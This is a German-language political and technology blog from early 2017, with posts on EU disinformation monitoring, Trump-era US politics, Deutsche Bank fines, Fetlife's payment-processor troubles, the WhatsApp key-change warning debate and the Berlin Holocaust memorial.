________________________________________

[Reporter] schrieb
>
> Werter [Leser], die genannte EU StratCom-Abteilung StratCom East
beschäftigt sich mit russischer und Kreml-naher Propaganda in der EU
bzw. auf die EU gerichtet. Insofern steht Bulgarien nicht wie früher
als faktische Sowjetrepublik, sondern als EU-Mitgliedsstaat im Fokus
dieser Abteilung.
>
> Mit besten Grüßen,
> [Reporter]
________________________________________

Von: [Leser]
An: [Reporter]
Betreff: Re: Das leise Sterben der Wahrheit

 > mit russischer und Kreml-naher Propaganda in der EU

Ja doch - habe ich durchaus verstanden.

Es soll doch aber offenkundig eine bulgarische Quelle (also eine
EU-Quelle?) der Desinformation überführt werden?

 > "The Bulgarian outlet “BG news 168”

Oder sind das getarnte Russen?

Also - Transparenz zur Beförderung der Wahrheit fühlt sich für mich
anders an.

Beste Grüße
[Leser]
________________________________________

Betreff: AW: Das leise Sterben der Wahrheit
Von: [Reporter]
An: [Leser]

kreml-nahe Quellen sind nicht notwendigerweise russische Quellen.
________________________________________

Oder, zusammengefasst: Kreml-nahe Quellen erkennt man daran, dass sie Propaganda schreiben. Und Propaganda erkennt man daran, dass sie Kreml-nahe Positionen vertritt. Gut, dass wir das mal geklärt haben!

Thu Feb 2 2017

[l] Trumps neuer Supreme-Court-Richter Neil Gorsuch hat in seiner elitären Privatschule nur für Jungs einen Club namens "Fascism Forever" gegründet und geleitet. Zur Abwehr der liberalen Tendenzen beim Personal der Schule.
Achtung: Daily Mail ist ein übles Hetzblatt, aber es ist ein nationalkonservatives Hetzblatt, kein liberales.
Update: Vorsicht bei der Geschichte, der Mann ist heute 50 und war damals unter 20, wie es klingt. Daher argumentiere ich hier wie bei Andrej Holm, dass man Menschen das Recht einräumen muss, in ihrer Jugend Fehler gemacht zu haben. Allerdings würde ich dann von dem Gorsuch auch erwarten, dass er öffentlich Reue zeugt. Und hey, vielleicht ist ja auch die ganze Story eine Ente. Wäre nicht das erste Mal bei der Daily Mail.

Wed Feb 1 2017

[l] Die Zeit hat einen fiesen Beitrag, in dem sie Pressestimmen zur Hitler-Kanzlerschaft gesammelt hat. Und das klingt auffällig nach dem, was die Medien so zu Trump gesagt haben (ich eingeschlossen).
Das Amt wird ihn vernünftig machen, sein Kabinett ihn zähmen. Eine Diktatur? Undenkbar. Wie Journalisten, Politiker, Schriftsteller und Diplomaten Hitlers Ernennung zum Reichskanzler kommentierten.
Besonders fies ist diese Parallele:
Dabei hatte Hitler in Mein Kampf und in seinen zahlreichen Reden vor 1933 nie verheimlicht, was er, einmal an der Macht, zu tun gedachte: das demokratische "System" von Weimar abzuschaffen, den "Marxismus" (womit Sozialdemokratie und Kommunismus gleichermaßen gemeint waren) "auszurotten" und die Juden aus Deutschland zu "entfernen". Was die Außenpolitik betraf, hatte er keinen Hehl daraus gemacht, dass es ihm zunächst um die Revision des Versailler Vertrages ging, das langfristige Ziel aber auf die Eroberung von "Lebensraum im Osten" gerichtet war.
Und genau wie Trump heute hat man es Hitler damals auch nicht geglaubt.

Tue Jan 31 2017

[l] Wenn ihr die Deutsche Bank ein bisschen verfolgt habt die letzten Jahre, und gesehen habt, wie die für praktisch alle größeren finanziellen Skandale am Ende eine Strafe aufgebrummt gekriegt haben, weil sie mitgemacht haben, denkt ihr euch vielleicht gerade: Hey, immerhin betreibt die Deutsche Bank keine Geldwäsche für die Russenmafia.
Nun, äh, da habe ich schlechte Nachrichten.
Die New Yorker Finanzaufsichtsbehörde DFS verhängte eine Strafe von umgerechnet knapp 400 Millionen Euro gegen das größte deutsche Geldhaus. Rund 200 Millionen Euro muss die Bank voraussichtlich in der gleichen Angelegenheit an die britische Bankenaufsicht FCA zahlen.
Ich halte es ja in Sachen Geldwäsche mit "Fischer im Recht". In diesem Fall ist der Vorwurf, dass Kunden der Deutschen Bank Aktien in Rubel gekauft und dann in Dollar verkauft haben, und das fällt anscheinend auch schon unter Geldwäsche heutzutage.

Fri Jan 27 2017

[l] In den USA gibt es gerade eine (für mich) absolut faszinierende Debatte. Die im Raum stehende Frage ist: Ist es OK, einen Nazi (ins Gesicht) zu schlagen.
Hintergrund ist diese Video, auf dem Richard Spencer ins Gesicht geschlagen wird, während er ein Interview gibt. Mir sagte der nichts, aber wenn man ihn ein bisschen googelt, findet man sowas hier. Vorsicht: Vox ist keine neutrale Quelle, die sind mehrfach durch starke linke Ideologie aufgefallen, an Artikeln, die nach Berichterstattung aussahen. Aber die Liste, die sie da haben, sieht einigermaßen OK aus. Hier ist seine Wikipedia-Seite. Im Wesentlichen wird dem Mann zur Last gelegt, dass er den Begriff "Alt Right" erfunden haben soll, als Teil einer Rebranding-Kampagne, die White Supremacy und rechtsradikale Agitation wieder salonfähig machen wollte. Und das scheint auch soweit funktioniert zu haben, denn zumindest er ist zu einigen Interviews eingeladen worden, die sonst einen Bogen um Faschisten gemacht hätten.
In der gerade laufenden Debatte sind sich also soweit alle einig, und fühlen sich auch genötigt, das in ihren Ausführungen explizit anzusprechen, dass das ein Riesenarschloch ist, für den sie persönlich nichts als Verachtung übrig haben.
Und jetzt wird im Internet wirklich die Frage debattiert, ob es OK ist, wenn man andere Menschen schlägt, weil sie widerliche Ideologien vertreten.
Den bisher schönsten Beitrag fand ich das Interview, das ein Reuters-Reporter mit dem Mann geführt hat, der früher bei der New York Times die Ethik-Kolumne gemacht hat. Und der sagt, wenig überraschend: Nein, das ist natürlich nicht OK. Selbst wenn man annimmt, dass der umgekehrt Gewaltanwendung gegen mich befürworten würde oder gar selbst durchführen könnte, selbst dann ist das nicht OK. Weil Ethik nicht heißt, dass man tut, was Richard Spencer für legitim hält, sondern dass man höhere Ideale anstrebt, wie die von Martin Luther King zum Beispiel.
Ich finde es ausgesprochen faszinierend, dass das jetzt überhaupt als Frage diskutiert wird. So weit sind wir schon verroht.

Thu Jan 26 2017

[l] Donald Trumps Twitter-Account ist an einen privaten Google-Mail-Account gekoppelt.
Früher haben wir ja Witzchen über sowas gemacht, aber heute muss man konstatieren: Das ist die Art von Sache, die Kriege oder Börsencrashes hervorrufen kann.
[l] Ich habe gerade gehäuft unzufriedene Mails von Leuten in der Inbox, die sich darüber aufregen, dass ich "Fake-News über Trump" bringe (oder ähnliche Formulierungen).
Daher möchte ich das hier nochmal (!) erklären.
Mein Blog hat u.a. die Aufgabe, Argumente und Behauptungen aus Partisanen-Medien in den Diskurs zu bringen, und dann, wenn die Fakten es hergeben, als Unsinn zu enttarnen. Und wenn es nötig ist, versteht sich. Manchmal mache ich das auch bloß aus Unterhaltungsgründen.
Das habe ich früher in die eine Richtung so gemacht, und jetzt mache ich es halt in die andere Richtung. Es liegt in der Natur der Sache, dass hauptsächlich immer die Argumente hier Erwähnung finden (und für Unmut sorgen), die nicht eh schon breit in den Massenmedien verbreitet werden. Es geht mir nämlich darum, beide Seiten anzuhören, bevor man eine Entscheidung trifft. Und wer eh schon an der Macht ist, der dominiert im Allgemeinen auch das Narrativ, und braucht keine Hilfe mehr von mir.
Wenn ihr also mein Blog früher gut fandet, weil es das getan hat, und heute nicht mehr, weil es das immer noch tut, dann ist das keine Beleg dafür, dass mein Blog schlechter geworden ist. Das ist überhaupt keine Aussage über mein Blog. Das ist eine Aussage über euch.
Denkt mal drüber nach.
Update: Häufig weiß ich auch einfach selber nicht, ob etwas wahr ist oder nicht, und welches die richtige Position ist, wenn man die Existenz einer richtigen Position überhaupt postulieren mag. Häufig ist daher das Sekundärziel, Mindermeinungen überhaupt erstmal zu Gehör zu bringen. Wenn ihr die nicht glauben wollt, ist das eure Sache und eure Entscheidung, aber fordert nicht von mir, dass ich sie unterdrücken soll. Das wird nicht geschehen.

Wed Jan 25 2017

[l] Ein Einsender hat mir einen länglichen Hilferuf geschickt, den ich hier mal übernehmen möchte (Kinder und Jugendliche unter 18 bitte kurz weggucken):
die internationale Dating- und BDSM-Community fetlife.com wird gerade existentiell bedroht. Die 2 Geschäftskonten des Betreibers bei 2 verschiedenen Banken sind gesperrt, auf Betreiben eines Kreditkartenunternehmens, das sich über "blood, needles, and vampirism" und etwas schwammiger über "Illegal or Immoral" Inhalte beschwerte. Als erste Maßnahme hat der Betreiber gezwungenermaßen Hunderte Gruppen und Accounts gelöscht, die einschlägige Themen behandeln oder auch nur im Namen trugen. Wohlgemerkt, es geht um sexuelle Fantasien und ausschließlich einvernehmliche Praktiken.
Warum sollte uns das kümmern?
1. Es sind hunderttausende Mitglieder aus vielen Ländern betroffen (Deutschland ist eine der größten Untergruppen), die oft keine andere Möglichkeit haben, überhaupt über ihre eigene Sexualität zu sprechen. Fetlife.com ist dezidiert queer und poly und offen, daß sie jetzt zu so einem Schritt gezwungen werden, richtet gewaltigen Schaden an.
2. Die Macht der Kreditkartenfirmen (und -abwickler) ist gewaltig. Ohne sie läuft in den USA gar nichts, keine Firma, keine Organisation, die auch nur irgendwie Geld bekommt, seien es Anzeigenerlöse oder Spenden. Das haben konservative Gruppen erkannt und benutzen diesen Hebel, um ihnen unangenehme Inhalte und Aktionen zu unterdrücken.
3. Es gibt keine gesetzlichen Regelungen, keinen Rechtsweg, um sich gegen so eine Kontosperrung wehren zu können. Die Situation ist vergleichbar mit Youtube-Sperrungen wg Copyrightclaims oder Facebook-Sperrungen wg "Verstoß gegen unsere Content-Policy".
4. Fetlife.com ist keineswegs ein Einzelfall, Seiten wie motherless, imagefap etc haben schon längst ganze Kategorien gelöscht und viele Begriffe un-suchbar gemacht.
5. Es geht nicht etwa nur um Sex oder "irgendwelche Vorlieben". Mit demselben Hebel (mit genügend Geld wedeln) können zB Immobilienbesitzer Websites von Mieterinitiativen lahmlegen. Die Taktik, dem Gegner einfach mal die Lebensgrundlage zu entziehen, wird wieder beliebter, siehe Humboldt-Uni gegen Andrej Holm.
6. Die BPjM hat dick die Finger drin, wenn es nach ihr ginge, wäre die ganze Community für Deutschland gesperrt, weil kein zertifiziertes Altersverifikationssystem (vulgo Gelddruckmaschine für Wegelagerer) den Zugang verhindert.
Was wäre zu tun?
Zunächst einmal ist Öffentlichkeit herzustellen, denn dann zensiert sichs nicht mehr so einfach unbemerkt im Dunkeln.
Die Diskussion um irgendwelche "dringend benötigte" Zensurinfrastruktur, wie aktuell für Facebook, klammert sich hierzulande sehr an Gepöbel und Holocaustleugnung, blendet aber die Folgen aus und vergißt, daß selbst das schlechteste Gesetz immerhin noch einen Rechtsweg besitzt - aber eine funktionierende Zensur in den Händen privater Firmen unangreifbar ist. Nötig wäre ein gesetzlicher Rahmen, der allen Firmen eine "Content-Neutralität" auferlegt und Verstöße dagegen ahnden kann.
Quellen:
Die Stellungnahme von John Baku, Betreiber von Fetlife.com
Zusammenfassung der Lage
Disclaimer:
Ich bin im Vorstand von BDSM-Berlin e.V. (bdsm-berlin.de), wir sind ein gemeinnütziger Verein und seit fast 20 Jahren aktiv in Sexualaufklärung, Beratung und Hilfe.
Das ist in der Tat eine Sache, über die viel zu wenig gesprochen wird, dass privatisierte Zensurinfrastruktur keinen Rechtsweg offen lässt. Ich habe das ja bei Facebook und Hatespeech schon ein paar Mal angesprochen, aber dass damit jetzt irgendwelche Puritaner anderen Leuten das Ausleben ihrer Sexualität untersagen wollen, das ist ja leider kein großer Schritt mehr von da aus :-(
Update: Highlight aus der verlinkten Stellungname von dem Fetlife-Betreiber:
Why haven't you embraced Bitcoin to get away from the restrictions of the banks / credit card companies? - @Eibon
We used to accept bitcoins through Coinbase.
They dropped us a year ago because we are a kinky site. No joke.
Kannste dir gar nicht ausdenken, sowas.

Tue Jan 24 2017

[l] Neulich in den Niederlanden: Der bekannte Journalist Bart Mos tweetet (der Originaltweet ist leider weg):
BREKEND Wij spraken met een getuige over Trumps Golden Shower. Morgen. @Telegraaf @MrNedjerov
Übersetzt heißt das: EILMELDUNG: Wir sprachen mit einem Zeugen über Trumps goldene Dusche. Gemeint ist, dass Trump gerade in Holland eine riesige Protz-Jacht bauen lässt, und da ausdrücklich eine goldene Dusche installiert haben wollte. Hier ist ein Foto davon.
Aber natürlich war das (absichtlich) missverständlich und anscheinend sind ein paar russische Medien voll aufgesprungen und haben sowas wie "ZEUGE FÜR TRUMPS SEX-ESKAPADEN PACKT AUS" verbreitet. Daraufhin hat der Journalist wohl ein bisschen Druck gekriegt, den Tweet wegzumachen und sich auch wortreich entschuldigt :-)
Hier ist ein Bild der "Jacht" (eher ein Kreuzfahrtschiff von der Größe her).
Update: Kris Köhntopp hat mehr Details. Das war nicht kürzlich, wie sich rausstellt, sondern in den 80er Jahren.
Der Punkt war, daß das alles 30 Jahre her ist, und Jos da einen Witz gemacht hat, der eskaliert ist.
Nichtsdestotrotz ist die Story interessant, weil a) die Yacht selbst eine spannende Geschichte hat und ein Star in einem James Bond Film ist, b) Trump sie praktisch umsonst bekommen hat (29 Mio, und noch eine Million Rabatt, wenn er sie umbenennt, weil Kashoggi sie nicht in Trumps Händen mit dem Namen seiner Tochter wissen wollte - kann ich verstehen), c) die Geschichte der Werft spannend ist und sie eine lange Historie an Kreuzfahrtschiffen für Superreiche hat und d) Trump nach der Yacht eine noch größere bauen wollte und die Holländer dafür bezahlen sollten. Das ging schief und am Ende mußte Trump die Werft kaufen.
Die Jacht gehört inzwischen übrigens nicht mehr Trump, der hat sie 1991 verkauft — und dabei 9 Millionen Dollar Verlust eingefahren. (Danke, Vincent)
[l] Erinnert ihr euch an Martin Shkreli? Den "Pharma Bro"? Der hier?
Nun, seit damals gab es ein paar Leute, die argumentiert haben, der sei gar nicht der Böse. Mit so Argumenten wie "der hat mit der Preiserhöhung gewartet, bis es ein Generikum gab" und "der Profit geht an eine wohltätige Organisation". Es ist also nicht mehr so völlig klar, ob der jetzt in der Story der Böse ist oder nicht. Hier ist zum Beispiel eine Story, bei der er sein Gesicht auktioniert hat. Der Gewinner der Auktion darf ihm einmal ins Gesicht hauen. Und die Kohle der Auktion ging an den Sohn eines verstorbenen Leukämie-Patienten.
Und hier ist seine gemeinnützige Stiftung.
Aber, wieso ich das jetzt blogge: Der hat die Schnauze voll davon, von der (nicht nur) aus seiner Sicht durch und durch kriminellen und korrupten Pharmabranche beschimpft zu werden. Also hat er mal kurz ne Webseite aufgemacht, auf der er die Schmutzwäsche seiner Pharma-Konkurrenten öffentlich wäscht :-)

Fri Jan 20 2017

[l] Ich möchte mal einen Trend ansprechen, der mich in letzter Zeit zunehmend irritiert. Ich will es mal als "Safe Spaces für Software" bezeichnen. Ein gutes aktuelles Beispiel ist die Debatte darum, ob Whatsapp jetzt eine Crypto-Backdoor hat oder nicht. Nun ist der Begriff "Backdoor" subjektiv und polarisierend, und es schwingt ein starker Vorwurf mit. Geschenkt. Aber wenn man diese Debatte ein bisschen verfolgt hat, findet man sofort Beiträge, bei denen Leute die Kritik an der Software als persönliche Kritik an Personen uminterpretieren. Und das sind häufig nicht die Leute, die die Software geschrieben haben, sondern Außenstehende.
Daher mein Vergleich mit Safe Spaces.
Auf mich wirkt das, als wenn Außenstehende sich bemühen, sich von Aussagen anderer triggern zu lassen, die gar nicht mal an sie gerichtet waren, und die auch nicht als Angriff auf irgendeine Person gemeint waren. Man fühlt sich durch Vorwürfe in seiner Lebensqualität beeinträchtigt, die man sich auch noch selber einbildet, die gar nicht tatsächlich da sind. Niemand hat Moxie beschuldigt, ein NSA-Kollaburateur zu sein!
Aber man muss schwere Krypto-Probleme auch ansprechen dürfen, denn sonst werden sie ja nie gefixt. In diesem Fall ist das Problem eine Sache, über die man verschiedene Meinungen haben kann. Das kommt auf die Perspektive an, wie so häufig.
Man kann auf der einen Seite sagen: Ein Krypto-System mit so einer Schwachstelle wiegt Menschen in falscher Sicherheit und ist daher schlimmer als gar keine Krypto.
Man kann auf der anderen Seite sagen: Wir haben eine Milliarde Menschen zu starker Krypto gekriegt, und dieser Angriff wäre eh ein aktiver Angriff, passives Abhören haben wir erfolgreich verhindert! Sieg!
Welche Perspektive sich durchsetzt, das entscheidet man mit einer Debatte. Aber die Debatte wird jetzt durch lauter Schneeflocken-Argumente gestört. Ja aber wenn ihr so böse zu Moxie seid, dann schreibt er vielleicht gar keine Software mehr für uns! Ihr solltet ihm lieber dankbar sein!
Ich spitze jetzt ein wenig zu, klar. Aber ihr versteht hoffentlich den Punkt, den ich zu machen versuche.
Wenn ihr nicht wisst, wovon ich hier rede, könnt ihr euch mal diese Argumentation hier durchlesen, die sogar so weit geht, "eure Krypto hat eine Schwäche" auf eine Stufe mit Impfgegnern zu stellen. Das schöne bei Krypto-Software ist ja, dass man sie stärker machen kann, ohne dass User mehr Aufwand haben. Den Mehraufwand übernimmt die Software für sie. Daher tendiere ich in diesem Spannungsfeld auch eher zu "wenn es stärkere Krypto gibt, die man an der Stelle ausrollen könnte, und man tut es nicht, dann ist das ein Fehler".
Konkret geht es um ein Detail im Protokoll, die von Anfang an bekannt und dokumentiert ist. Ich paraphrasiere das jetzt wahrscheinlich falsch, aber ich mache es trotzdem mal. Wenn euch die Details wichtig sind, schlagt sie selber nacht :-)
Bei traditionellen Kryptosystemen wie PGP hat man eine Nachricht, verschlüsselt und signiert sie, und schickt sie zu. Signieren und Verschlüsseln sind offline, man braucht dafür keinen Live-Kanal zum Gegenüber oder überhaupt Internet (solange man den public key vom Gegenüber hat). Die Nachricht schickt man dann rüber und fertig.
Neuere Kryptosysteme wie OTR haben aber noch weitergehende Anforderungen als PGP. Wenn ich eine PGP-Nachricht an jemanden schicke, dann beweise ich damit nicht nur demjenigen, dass die Nachricht von mir kam, sondern der kann die dann auch Dritten gegenüber als Beweis benutzen, dass die Nachricht von mir kam. OTR möchte jetzt erreichen, dass ich jemandem etwas so sagen kann, dass der weiß, dass das von mir kam, aber er kann damit nicht Dritten gegenüber beweisen, dass das von mir kam. Das ist protokolltechnisch eine komplexe Geschichte, weil man pro Nachricht einen anderen Schlüssel nehmen muss. Und damit ist auch das Schlüsselaustauschproblem größer als bei PGP. Signal und Whatsapp sehen jetzt vor, dass man im Voraus ein paar Schlüssel sozusagen vor-austauscht, damit man auch offline Nachrichten verschicken kann (jedenfalls solange die Liste der vorausgetauschen Schlüssel noch nicht leer ist). Jeden Schlüssel kann man natürlich nur einmal nehmen.
Das Problem, um das es jetzt geht, ist was passieren soll, wenn diese Liste mal alle ist. Sagen wir mal, das FBI will meine Whatsapp-Nachrichten mitlesen. Dann gehen die zu Whatsapp und sagen denen: sag diesem Client mal, dass seine Liste ungültig ist. Weil der Client gerade offline sein kann, heißt das auch, dass möglicherweise Nachrichten mit neuem Schlüssel nochmal verschlüsselt werden müssen. Ihr könnt schon ahnen, wie man so möglicherweise Abhör-Möglichkeiten schaffen könnte.
Das Problem ist jetzt, dass bei Whatsapp in dem Fall kein Warn-Popup kommt. Die Security-Hardliner (zu denen ich mich an der Stelle auch zähle) sagen jetzt: Dafür gibt es keine Entschuldigung. Macht da nen Warn-Popup hin. Das sollte auch so gut wie nie Fehlalarm geben.
Die anderen sagen: Man kann diese Warnung aber anschalten, und der Whatsapp-Server kann nicht wissen, wer das angeschaltet hat und wer nicht, daher können die das nicht machen, ohne entdeckt zu werden. Das Risiko ist überschaubar.
Kann man finden, aber ich finde das nicht. Erinnert ihr euch an die Stories aus der DDR, wenn die Stasi das Telefon abgehört hat, dass das dann hörbar geknackst hat? Da hätte man ja auch argumentieren können: Nicht so schlimm, die Leute merken das ja, wenn sie drauf achten. Das hat die Stasi nicht abgehalten, und das wird das FBI nicht abhalten, glaube ich. Und das UI ist wohl an der Stelle auch nicht offensichtlich, wo man da was klicken muss, um diese Warnung anzuschalten. Ich weiß es nicht, weil ich kein Whatsapp benutze.
Ich finde aber, dass diese Debatte wichtig ist und geführt werden wollte. Und ihr solltet da auch alle mal drüber nachdenken, wie ihr das seht, und dann eure Krypto-Produkte entsprechend auswählen.
Update: Bei meinen Rust-Kommentaren ist übrigens auch so eine Schneeflocken-Safespace-Ding passiert. Gleich mehrere Leute haben sich aufgeregt, dass ich es wage, Rust als nicht stabil zu bezeichnen (was ich gar nicht getan habe! Ich habe den Branch referenziert, den Rust selber auf ihrer Downloadseite als Stable bezeichnet). Ein Leser hat mich auf einen Reddit-Thread hingewiesen, der sich dazu gebildet hat, und ungefähr die Hälfte der Kommentare handelten nicht von meinen Argumenten sondern von mir als Person. Als ob man sich mit Kritik oder Argumenten nicht beschäftigen müsste, nur weil man die Person nicht mag!? Sowas finde ich immer echt unverständlich. Es geht doch hier um euer Softwareprojekt, wollt ihr nicht, dass das besser wird!?
Update: Ah, die Erklärung habe ich wohl tatsächlich verkackt. Whatsapp und Signal haben die Authentisierung an die Telefonnummer gebunden. Das hat Vorteile (besonders bei der Usability), aber es hat halt auch Nachteile, weil das FBI halt einfacher eine Telefonummer übernehmen kann als die Krypto in der App auf dem Telefon, das ich in der Tasche habe.
Update: Ist sogar noch ein bisschen anders. Selbst wenn man das Popup anschaltet, dann hat Whatsapp trotzdem schon eine Retransmission der Nachricht mit dem neuen Key gemacht. Signal macht das erst, wenn der Nutzer es bestätigt hat.
[l] Zu meinen Denkmal-Gedanken kam noch eine schöne Einsendung rein, die ich mit euch teilen will:
ich lese gerade deine Gedanken zu Yolocaust und da fällt mir eine Situation aus meiner Schulzeit ein. Nein, wir haben kein KZ besucht. Die Nazi-Zeit war eh in Geschichte nur angekratzt worden. Das meiste dazu haben wir im Deutschunterricht vermittelt bekommen, weil der Deutschlehrerin das wichtig war.
Aber ich habe in der 9. Klasse an einem Schüleraustausch mit Paray-Vielle-Poste in Frankreich teilgenommen, und damals haben wir das im Wald von Compiègne gelegene Waffenstillstandsmuseum besucht. Die Geschichtsträchtigkeit dieses Ortes war uns deutschen Kids schon irgendwie bewusst, aber unsere Austauschpartner sahen das alles nicht so eng und nur Minuten nach der Führung durch das Museum fanden wir uns draußen wieder und die ersten rannten durch die Parkanlage, setzen sich auf den Gedenkstein in der Mitte und packten das Proviant aus. Manche spielten fangen.
Eine der Lehrerinnen stand etwas abseits und fing an zu weinen. Als wir fragten, was denn los sei meinte sie, dass sie das einfach überwältigt hätte. Das Deutsche und Franzosen einige Jahrzehnte später an einem Ort wie diesem friedlich zusammensitzen und entspannt Fangen spielen. Neben dem französischen Schüler, der uns auf dem Schulhof mit Heil Hitler begrüßte wohl der einschneidenste Moment des Austauschs.
Und sie schickt auch noch ein paar weiterführende Links mit: Ein Luftfoto und Wikipedia eins und zwei.
Generell finde ich diesen Bitchmove von 1940 interessant, dabei ist er den Wenigsten bekannt. Er zeigt einmal mehr was Hitler für eine widerliche Person war. Eine einfache Unterwerfung war ihm nicht genug. Er musste die Franzosen zusätzlich demütigen, in dem er denselben Ort wie 1918 wählte.
Update: Ein anderer Einsender kommentiert:
Hitler hat hier nur exakt den Bitchmove wiederholt, den zuvor die Franzosen 1918 gemacht haben. Denn denen war eine einfache Unterwerfung nicht genug. Sie wählten für die Unterzeichnung der Kapitulation Deutschlands exakt den Platz (Versailles), wo sich zuvor 1871 Wilhelm zum Deutschen Kaiser hat ausrufen lassen.
Wie das so ist mit Auge um Auge, Zahn um Zahn. Am Ende kann keiner mehr beißen oder sehen.
Update: Geht noch weiter mit den Bitchmoves :-)
Hi, wenn man schon die Henne-Ei Frage dieses speziellen Austauschs von Aufmerksamkeiten zwischen Deutschland und Frankreich angeht sei darauf verwiesen, dass der ursprüngliche Bitchmove natürlich von Wilhelm ausging, der sich im französischen Prunkschloss des eben erst besiegten Gegners zum Deutschen Kaiser krönen lies.

Thu Jan 19 2017

[l] Ich frage mich gerade, ob das eigentlich verwerflich ist, wenn junge Menschen auf dem Holocaust-Denkmal herumturnen und Selfies machen.
Oder anders: Was ist daran verwerflich?
Ist das nicht die Idee von einem Denkmal, einen Platz zu schaffen, wo man nachdenken kann?
Ich weiß nicht, ob ihr mal mit einer Schulklasse zu einem KZ gefahren seid. Bei mir in Westberlin war das Teil des Kurrikulums. Wir sind nach Sachsenhausen gefahren mit der Klasse. Und ich erinnere mich noch ganz genau, dass auf dem Weg zum KZ einige Schüler halt überschwänglich herumgeturnt haben, mit ihrem Walkman oder einem Gameboy oder so gespielt haben vielleicht, sich laut mit ihren Kumpels unterhalten und gescherzt. Auch noch kurz vor dem Tor von dem KZ. Ein paar auch noch auf dem Gelände. Denn es dauert ein bisschen, bis die Enormität der Situation bei allen ankommt. Aber sie ist bei allen angekommen. Ich glaube heute, dass das auch ein Mechanismus ist, um mit so etwas überhaupt umgehen zu können, gerade als Kind oder Jugendlicher.
Eine der "Angeklagten" bei Yolocaust kam aus Südamerika, wenn ich das richtig gesehen habe. Der wird man also keinen Vorwurf machen können, am Holocaust beteiligt gewesen zu sein. Wertet das das Denkmal ab, wenn Unbeteiligte in seiner Nähe auf auf dem Gelände … halt leben? Heißt Denkmal, dass man da mit gekrümmter Körperhaltung still schluchzen muss? Ist das nicht im Gegenteil auch ein gutes Zeichen, wenn das Leben weitergeht, wenn aus etwas so Furchtbarem trotzdem etwas wie Lebensfreude entspringen kann?
Ich habe mir solche Gedanken mal auf einem Friedhof gemacht, wo man ja ähnlich argumentieren kann, dass das ein Ort für das stille Gedenken an die Verstorbenen ist. Aber was würdet ihr lieber haben wollen, wenn ihr mal tot seid, dass auf eurem Grab Kinder fröhlich tanzen, oder dass da schwarz gekleidete Leute miese Laune haben?
Ich weiß nicht, was die Antwort ist. Aber so einfach sollte man es sich glaube ich nicht machen.
Update: Einige Einsender schreiben mir, dass der Künstler hinter dem Holocaust-Denkmal sich auch mal zu der Frage geäußert hat, und er hat wohl ausdrücklich dazu aufgerufen, das Denkmal auch "profan" zu nutzen, nicht nur zum schlechte Laune haben. Ein Einsender formulierte sehr schön:
Das Denkmal in Berlin ist sehr auffällig, sehr groß und sehr zugänglich, nichtsdestotrotz ist es außerdem unfassbar schlicht. Die ersten Attribute sind offensichtliche Parallelen zum Gegenstand des Denkmals. Faszinierend finde ich allerdings den Effekt, den es in der Interaktion mit Menschen hat. Diese Schlichtheit und Zugänglichkeit sorgt dafür, dass in ebendieser Interaktion sehr viel mehr von den Menschen (und ihrer Auseinandersetzung mit dem Gegenstand) zu sehen ist als vom Denkmal selbst. In dieser Weise ist es ein riesiger Spiegel, der den Menschen vorgehalten wird. Und dieser Effekt kommt auf jedem Bild krass raus. Verstärkt noch dadurch, dass auf jedem Bild, aus jeder Perspektive trotz der Schlichtheit unmittelbar klar ist, dass es DIESES Denkmal ist. In der Hinsicht ist das ganz schön großartig!
[l] Zu den Höcke-Äußerungen gerade gibt es sowas wie einen Diskurs zwischen Rechten und Linken, bei denen zur Entlastung eine Äußerung von Rudolf Augstein von 1998 vorgebracht wird, die ich hier mal zitieren will:
Nun soll in der Mitte der wiedergewonnenen Hauptstadt Berlin ein Mahnmal an unsere fortwährende Schande erinnern. Anderen Nationen wäre ein solcher Umgang mit ihrer Vergangenheit fremd. Man ahnt, daß dieses Schandmal gegen die Hauptstadt und das in Berlin sich neu formierende Deutschland gerichtet ist. Man wird es aber nicht wagen, so sehr die Muskeln auch schwellen, mit Rücksicht auf die New Yorker Presse und die Haifische im Anwaltsgewand, die Mitte Berlins freizuhalten von solch einer Monstrosität.
Die Rechten argumentieren, dass das doch fast das gleiche ist wie was der Höcke gesagt hat. Viele werden sich nicht mehr erinnern, aber das Holocaust-Denkmal ist damals durchaus kontrovers diskutiert worden, und es gab viele Gegenstimmen, vor allem gegen den konkreten Entwurf, nicht so sehr fundamental gegen die Existenz eines solchen Denkmals. Aber lest mal bitte den Rest der Augstein-Äußerungen, nicht nur diesen Absatz. Da wird dann relativ klar, was er wirklich sagen wollte.
Übrigens, völlig unabhängig von Höcke und Augstein: Ein israelischer Künstler hat mal eine Photoshop-Gallerie aus Selfies von dem Holocaust-Denkmal gemacht, nennt sich "Yolocaust".
Update: Tweet von Jakob Augstein:
Nein, Kameraden. Der alte Augstein lässt sich nicht vor euren dreckigen Karren spannen.
und ein Link zu seiner Kolumne dazu.
Update: Niggemeier hat eine längliche Brandschrift veröffentlicht. Seine Schlussfolgerung ist, dass Augstein dann halt auch antisemitische Äußerungen getätigt hat.
Das liegt jetzt fast 20 Jahre zurück, aber ich glaube mich daran erinnern zu können, dass auch der Augstein damals für diese Äußerungen massiv auf die Fresse gekriegt hat. Das war keinesfalls so, dass der Augstein das halt ansagt und alle Umstehenden nicken zustimmend.
[l] Wie Island es geschafft hat, Alkohol- und Zigarettenkonsum unter Teenagern fast komplett loszuwerden. Das ist eine sehr lesenswerte Geschichte, was die da gemacht haben, auch wenn es von den Maßnahmen her am Ende ein bisschen autoritär klingt. So haben sie z.B. gesetzlich eine nächtliche Ausgehsperre für Teenager verhängt. Aber sie haben halt auch dafür gesorgt, dass die Kids was anderes zu tun haben, zum Beispiel Sportvereine oder sich künstlerisch ausleben können.

Wed Jan 18 2017

[l] Nachdem die selbst gerade im Immobiliensumpf versinkende SPD Andrej Holm in der Politik verhindert hat (es geht die Verschwörungstheorie um, die SPD sorge sich davor, dass da mal jemand im Bausumpf herumstochern könnte, weil der da lauter peinliche Dinge finden könnte), hat jetzt auch die HU Andrej rausgeschmissen.
Existenzvernichtung erfolgreich abgeschlossen. Na da könnt ihr ja alle stolz auf euch sein jetzt. Ich möchte bei der Gelegenheit darauf hinweisen, dass weder Eberhard Diepgen noch Klaus-Rüdiger Landowsky jemals auch nur von der Größenordnung hervergleichbare Existenzvernichtung hinnehmen mussten für ihre Rolle im Berliner Immobiliensumpf und dem Landesbankskandal. Die können sich auf ihren jahrelang eingestrichenen Reichtümern ausruhen. Aber den Holm, den machen wir jetzt platt!1!! Gerechtigkeit für alle!!1!
